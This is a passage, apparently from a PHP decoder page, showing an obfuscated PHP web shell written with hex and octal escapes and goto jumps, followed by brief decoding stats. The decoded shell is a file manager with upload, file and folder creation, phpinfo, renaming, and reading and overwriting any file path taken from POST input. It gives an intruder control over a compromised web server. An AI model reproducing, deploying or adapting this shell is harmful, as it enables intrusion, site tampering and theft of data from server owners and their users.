"\47\40\x73\164\171\154\x65\75\x27\x77\x69\144\164\150\x3a\40\61\x30\x30\x25\x3b\47\x3e\74\150\x72\40\x63\157\x6c\157\x72\x3d\x27\x47\x72\x61\171\x27\x3e\xa\x3c\151\x6e\x70\x75\x74\40\x74\x79\160\x65\x3d\x27\163\165\x62\155\x69\164\47\40\156\141\x6d\145\75\x27\x75\x70\x6c\x6f\x61\x64\47\x20\166\x61\x6c\165\x65\75\47\165\x70\x6c\x6f\141\x64\x27\x3e\12\74\x69\156\x70\165\164\40\164\171\x70\x65\75\47\x73\x75\x62\x6d\x69\x74\47\x20\x6e\141\x6d\x65\x3d\47\x63\x72\145\141\164\145\x5f\x66\x6f\154\144\145\162\x27\40\166\141\x6c\x75\x65\75\x27\53\40\146\x6f\154\144\x65\162\47\x3e\xa\x3c\x69\156\160\x75\x74\x20\x74\171\160\x65\75\x27\x73\165\142\155\151\164\47\40\156\141\155\x65\75\47\143\x72\145\x61\x74\x65\137\x66\151\x6c\x65\47\x20\166\x61\154\165\x65\x3d\47\53\40\x66\x69\x6c\145\x27\x3e\xa\74\x69\x6e\160\165\164\x20\x74\x79\x70\145\x3d\x27\x73\x75\x62\155\x69\164\x27\x20\x6e\x61\x6d\145\75\x27\x70\150\160\151\156\x66\157\x27\40\x76\141\154\x75\145\x3d\47\160\150\x70\151\x6e\146\157\47\x3e"; goto jQLDO; j33Pj: echo "\x3c\x66\157\162\x6d\40\x61\143\x74\x69\x6f\x6e\75\x27\47\40\x6d\x65\x74\150\157\x64\75\47\x70\x6f\163\x74\47\x20\145\156\x63\164\171\x70\x65\75\x27\155\x75\x6c\164\x69\x70\x61\x72\x74\x2f\146\157\162\x6d\55\144\141\164\141\47\76"; goto P70p5; WZ2wP: $scanPath = scandir($path); goto Zackz; KcYvS: if (!is_dir($path)) { if (substr($path, 0, 2) == "\x23\105") { if (!is_file(substr($path, 2))) { header("\114\157\143\141\164\151\157\156\72\x20\77\x70\141\164\x68\75" . base64_encode(__DIR__) . ''); } } else { if (substr($path, 0, 2) == "\43\x52") { if (!is_file(substr($path, 2))) { if (!is_dir(substr($path, 2))) { header("\114\x6f\x63\141\164\x69\157\156\72\x20\x3f\x70\x61\x74\150\x3d" . base64_encode(__DIR__) . ''); } } } else { if (substr($path, 0, 2) == "\x23\x44") { if (!is_file(substr($path, 2))) { if (!is_dir(substr($path, 2))) { header("\x4c\157\x63\141\x74\151\157\156\x3a\x20\77\x70\141\164\150\75" . base64_encode(__DIR__) . ''); } } } else { if (substr($path, 0, 2) == "\x23\x43") { if (!is_file(substr($path, 2))) { if (!is_dir(substr($path, 2))) { header("\114\157\143\141\164\x69\x6f\156\x3a\40\x3f\160\141\164\x68\x3d" . base64_encode(__DIR__) . ''); } } } else { header("\114\x6f\143\x61\x74\x69\x6f\x6e\72\40\77\160\141\164\150\x3d" . base64_encode(__DIR__) . ''); } } } } } goto j33Pj; Ai3T_: if (substr($path, 0, 2) == "\43\x52") { echo "\74\x69\156\160\x75\x74\40\164\x79\160\x65\75\x27\x74\x65\170\164\x27\40\162\x65\141\144\x6f\x6e\x6c\171\x3d\47\x72\x65\141\144\157\156\154\x79\47\40\166\141\x6c\165\145\75\47" . substr($path, 2) . "\47\40\151\x64\75\47\x6f\x6e\x65\47\40\163\x74\x79\154\x65\x3d\x27\x77\x69\x64\x74\x68\x3a\x20\x38\60\x25\73\x27\76"; $delta = substr($path, 2); $back = dirname($delta); if (isset($_POST["\163\165\x62\155\x69\164\x5f\x72\145\x6e\x61\155\x65"])) { $alphacheck = dirname($delta) . $slash . $_POST["\x72\x65\x6e\141\155\x65"]; if (!is_dir($alphacheck)) { if (!is_file($alphacheck)) { if (rename($delta, $alphacheck)) { echo "\xa\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\40\40\40\74\x73\x63\162\151\x70\164\x3e\12\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\141\154\x65\162\x74\50\x27\x73\x75\143\x63\145\x73\163\x66\165\154\x6c\171\x27\x29\x3b\xa\40\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\40\40\40\x20\144\x6f\x63\x75\x6d\x65\x6e\164\56\154\157\x63\141\164\151\x6f\x6e\x2e\150\162\145\146\40\75\x20\x27\77\x70\x61\164\x68\75" . base64_encode($back) . "\47\x3b\xa\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\40\40\x20\40\x20\40\40\40\74\x2f\x73\x63\162\151\x70\x74\76\12\x20\40\40\40\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20"; } else { echo "\xa\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\40\40\x20\40\40\x20\x20\x20\40\x3c\x73\x63\162\x69\160\164\76\12\40\40\x20\x20\x20\x20\40\40\40\40\40\40\x20\x20\x20\x20\40\x20\x20\40\x61\x6c\145\x72\x74\50\47\146\x61\151\154\145\144\x27\x29\x3b\12\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x64\157\x63\165\x6d\x65\156\x74\x2e\x6c\157\x63\x61\x74\151\157\x6e\56\x68\162\145\x66\x20\x3d\40\x27\x3f\160\141\164\x68\75" . base64_encode($back) . "\47\73\xa\40\x20\40\x20\x20\40\x20\x20\40\40\40\40\40\40\40\40\x20\x20\40\40\74\57\x73\x63\x72\x69\160\x74\x3e\xa\x20\x20\x20\x20\40\x20\x20\40\40\40\40\40\40\x20\x20\40\40\40\40\40"; } } else { echo "\xa\x20\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\40\x3c\x73\x63\x72\151\x70\164\x3e\xa\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\40\40\141\x6c\145\x72\x74\50\x27\x66\151\x6c\145\x20\156\x61\155\145\40\x61\154\x72\145\144\171\40\145\170\x69\x73\164\x73\47\51\x3b\12\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\144\157\143\x75\x6d\145\x6e\164\x2e\154\x6f\143\141\x74\x69\157\x6e\56\150\x72\145\146\40\75\40\x27\x3f\x70\x61\x74\x68\x3d" . base64_encode($back) . "\x27\x3b\12\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\x20\40\40\74\x2f\163\x63\162\x69\160\x74\76\xa\40\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\40\x20\x20"; } } else { echo "\12\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x3c\163\143\162\x69\160\164\76\12\x20\40\x20\40\40\x20\40\x20\40\x20\40\40\x61\154\x65\162\164\50\47\146\157\x6c\x64\x65\x72\40\156\141\155\x65\40\141\154\162\145\144\x79\40\x65\170\x69\163\x74\163\47\51\x3b\xa\40\x20\40\40\40\40\40\40\40\40\40\40\x64\157\x63\x75\155\x65\x6e\x74\56\x6c\157\143\141\164\x69\157\156\x2e\x68\162\145\146\x20\75\40\x27\77\160\141\164\x68\x3d" . base64_encode($back) . "\47\x3b\xa\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x3c\x2f\163\x63\x72\x69\160\164\x3e\12\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20"; } } echo "\xa\40\x20\x20\40\x3c\151\156\x70\165\x74\x20\x74\171\x70\x65\75\47\x74\145\x78\x74\47\40\x69\144\75\x27\164\x68\x72\145\x65\47\40\x61\x75\x74\157\143\x6f\155\x70\154\x65\164\145\x3d\47\x6f\x66\146\47\x20\x6e\x61\155\x65\75\x27\x72\145\156\141\x6d\145\47\x20\x76\141\x6c\165\x65\75\47" . basename($delta) . "\x27\76\74\x68\x72\x20\x63\157\154\157\x72\x3d\x27\x47\162\141\171\47\76\x3c\x63\145\156\164\x65\162\76\xa\x20\x20\x20\x20\x3c\141\x20\150\162\x65\x66\x3d\47\77\x70\141\164\x68\75" . base64_encode($back) . "\47\x3e\x63\x61\x6e\x63\145\154\74\57\x61\76\74\x69\156\x70\x75\164\40\x74\x79\160\145\75\47\x73\x75\x62\155\x69\x74\47\x20\x6e\x61\x6d\x65\x3d\47\x73\x75\x62\155\151\164\x5f\x72\x65\156\x61\155\145\x27\x20\166\141\x6c\165\145\x3d\x27\x72\x65\x6e\x61\155\145\x27\x20\x69\144\x3d\x27\164\x77\157\x27\x3e\12\x20\x20\40\x20"; die; } goto eDuok; VoETZ: if (substr($path, 0, 2) == "\43\x45") { echo "\x3c\151\156\160\165\x74\x20\164\171\x70\x65\75\x27\164\145\x78\164\x27\x20\x72\x65\x61\144\157\x6e\154\x79\75\47\162\x65\x61\144\x6f\156\154\x79\x27\40\166\141\x6c\x75\x65\x3d\47" . substr($path, 2) . "\47\x20\x69\x64\x3d\x27\157\x6e\145\47\x20\x73\x74\x79\154\x65\x3d\x27\x77\151\144\x74\x68\72\x20\70\x30\45\x3b\x27\x3e\74\150\162\40\x63\x6f\154\x6f\162\75\x27\107\x72\x61\x79\x27\76\x3c\x63\x65\156\x74\x65\162\76"; $back = dirname(substr($path, 2)); if (isset($_POST["\x73\141\x76\x65\137\145\144\151\164"])) { $delta = substr($path, 2); $editz = fopen($delta, "\167"); if (fwrite($editz, $_POST["\145\x64\x69\x74\x5f\x64\141\x74\x61"])) { echo "\xa\40\40\x20\x20\40\40\x20\x20\40\40\40\40\x3c\x73\143\162\151\x70\x74\x3e\12\40\40\x20\40\40\40\40\x20\x20\40\40\40\x61\154\x65\x72\x74\x28\47\163\x75\x63\143\x65\163\163\146\165\154\154\x79\47\x29\x3b\12\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\144\x6f\x63\165\x6d\x65\x6e\x74\56\154\157\143\x61\x74\x69\157\156\56\150\162\x65\146\x20\75\x20\x27\x3f\160\x61\164\150\75" . base64_encode($back) . "\x27\73\12\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x3c\x2f\x73\x63\162\151\x70\164\76\xa\40\x20\40\x20\40\40\40\x20\40\x20\40\x20"; fclose($editz); } else { echo "\12\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\74\x73\143\162\x69\160\x74\76\xa\40\40\40\40\x20\x20\40\40\x20\40\40\x20\141\154\145\162\x74\50\x27\x66\141\x69\154\145\x64\47\x29\73\12\x20\40\40\x20\x20\40\40\40\x20\40\x20\40\x64\157\143\x75\x6d\x65\x6e\x74\x2e\x6c\157\x63\141\164\151\x6f\x6e\56\150\162\145\x66\x20\75\x20\47\77\x70\x61\x74\x68\75" . base64_encode($back) . "\x27\73\xa\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\74\57\x73\x63\162\151\160\x74\76\12\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\40"; fclose($editz); } } if (filesize(substr($path, 2)) == 0) { echo "\12\40\40\x20\40\x20\x20\x20\x20\x3c\x74\145\x78\x74\141\x72\x65\141\x20\156\141\x6d\x65\x3d\x27\145\x64\151\164\137\144\141\x74\x61\47\x3e\x3c\x2f\x74\x65\x78\x74\x61\x72\x65\141\76\74\150\x72\40\x63\x6f\154\x6f\162\x3d\x27\x47\x72\141\x79\x27\x3e\74\141\x20\150\162\x65\146\75\47\x3f\x70\x61\164\150\x3d" . base64_encode($back) . "\x27\76\x63\141\156\143\x65\x6c\x3c\57\x61\x3e\xa\x20\x20\x20\40\x20\x20\x20\x20\74\151\x6e\x70\x75\164\40\164\x79\x70\x65\x3d\47\163\165\142\155\x69\164\47\x20\156\x61\155\x65\x3d\47\x73\141\x76\x65\x5f\145\144\x69\164\x27\40\x76\141\x6c\165\x65\x3d\47\x73\141\166\145\47\40\151\x64\x3d\47\164\167\157\47\x3e\xa\40\40\x20\x20\x20\40\40\x20"; } else { $textareaValue = fopen(substr($path, 2), "\162"); $textareaValue = fread($textareaValue, filesize(substr($path, 2))); $textareaValue = htmlspecialchars($textareaValue); echo "\12\40\x20\x20\x20\40\40\x20\x20\x3c\164\145\x78\164\x61\162\x65\x61\x20\x6e\141\155\x65\75\47\145\144\x69\164\x5f\x64\141\x74\x61\47\76" . $textareaValue . "\74\x2f\x74\x65\x78\x74\141\162\145\141\76\xa\x20\40\40\40\x20\x20\40\x20\x3c\x68\x72\40\143\157\x6c\157\x72\75\x27\x47\x72\x61\171\x27\76\x3c\x61\x20\x68\x72\x65\x66\x3d\47\77\x70\x61\x74\150\75" . base64_encode($back) . "\47\x3e\143\141\156\x63\x65\x6c\74\57\x61\76\x3c\151\x6e\160\x75\164\40\164\x79\160\x65\x3d\x27\163\x75\142\155\151\164\x27\x20\x6e\141\155\145\x3d\x27\163\x61\x76\145\x5f\145\x64\x69\164\47\40\x76\x61\154\x75\145\75\x27\163\x61\166\x65\x27\40\151\x64\75\x27\x74\167\x6f\x27\x3e\12\40\40\x20\40\x20\40\x20\40"; fclose($textareaValue); } die; } goto Ai3T_; PR0tu: ?>

Function Calls

None

Variables

None

Stats

MD5 ae7c95fa9ab516b133259bfa7695b315
Eval Count 0
Decode Time 121 ms